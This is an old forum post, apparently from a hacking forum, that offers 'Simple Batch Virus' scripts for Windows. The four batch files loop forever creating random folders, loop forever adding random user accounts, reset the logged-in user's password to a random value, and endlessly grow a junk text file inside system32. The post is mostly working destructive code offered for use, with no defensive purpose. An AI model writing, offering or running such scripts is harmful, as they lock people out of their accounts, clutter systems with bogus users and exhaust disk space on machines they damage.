Simple Batch Virus 08-24-2012, 06:11 PM
#1
Generate Infinite Folders:
Generate Infinite Users:
Replace Logged In User Password With Random Password:
Create A Random .txt file And Keep On Adding text To It Causing Increase In File Size
Will Add some more later..
Code:
@echo off
:loop
mkdir %random%%random%
goto :loopGenerate Infinite Users:
Code:
@echo off
:loop
net user/add %random% %random%
goto :loopReplace Logged In User Password With Random Password:
Code:
@echo off
net user %username% %random%Create A Random .txt file And Keep On Adding text To It Causing Increase In File Size
Code:
@echo off
cd C:\windows\system32
:loop
echo 101010101010101010010101010100101010100101010101010100101010101010 >>%random%.txt
goto :loopWill Add some more later..
![[Image: fow57.jpg]](http://i.imgur.com/fow57.jpg)

![[+]](https://sinister.li/images/modern/collapse_collapsed.png)

